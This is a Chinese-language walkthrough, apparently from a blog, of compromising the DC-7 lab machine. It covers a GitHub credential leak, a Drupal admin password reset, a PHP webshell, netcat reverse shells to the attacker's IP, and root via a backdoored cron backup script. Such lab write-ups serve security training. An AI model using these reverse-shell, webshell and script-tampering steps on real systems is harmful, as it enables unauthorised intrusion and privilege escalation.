DC-7靶机渗透测试详细教程

DC-7

攻击者kali:192.168.1.11

受害者DC-7:192.168.1.12

通过arp-sacn -l 扫描到DC-7的IP地址

使用namp扫描DC-7

nmap -sS -A -p- 192.168.1.12

发现有22和80端口

访问一下80

打开首页就直接提醒我们暴力破解是没有用的,跳出框外思考

网页右下角有个@DC7USER

百度一下

GitHub有这个

有个项目的源码,点击进去看看

配置文件里的数据库用户名账号正好是dc7user还有数据库的密码

尝试用这个账号连接ssh

连接成功!

提醒我们又封邮箱

查看一下

backups备份的意思,可能是个备份脚本,去查看一下

而且这脚本还是有权限执行的

尝试加提权命令看看

不行,不允许添加

貌似这脚本好像提示着什么

进入到/var/www/html下

drush user-password admin --password="demon"

修改管理员密码

去web页面登录一下

需要去下载php插件

php 8.x-1.x-dev | Drupal.org

下载好后上传

安装成功

点击Enable newly added modules激活模块

点击前面的三角将前几栏折回,找到PHP Filetr够选

并且点击install

安装成功

这里可以新建内容

尝试写入一句话木马,选着PHP,点击保存

显示页面

复制链接尝试用蚁剑连接看看

连接成功

进入终端反弹shell

kali端先监听

nc -lvnp 4444

蚁剑终端

nc -e /bin/sh 192.168.1.11 4444

打开交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

提权想到之前那个脚本

有权限

kali再监听一个端口

nc -lvnp 6666

将反弹shell写入脚本

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh

然后再执行脚本

提权到root

DC-7总结

nmap扫描

注意站点信息,站外信息收集查询,查到GitHub上的源码,发现数据库账号密码

尝试进行ssh远程登录,发现邮箱,发现备份脚本的作用

修改web页面admin账号的密码登录到web界面

安装PHP插件

添加一句话木马php页面

蚁剑连接,shell反弹到kali

打开交互模式 python -c 'import pty;pty.spawn("/bin/bash")'

echo "nc -e /bin/bash 192.168.1.11 6666" >> /opt/scripts/backups.sh

修改备份脚本,并且执行,拿到root权限

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

啊醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值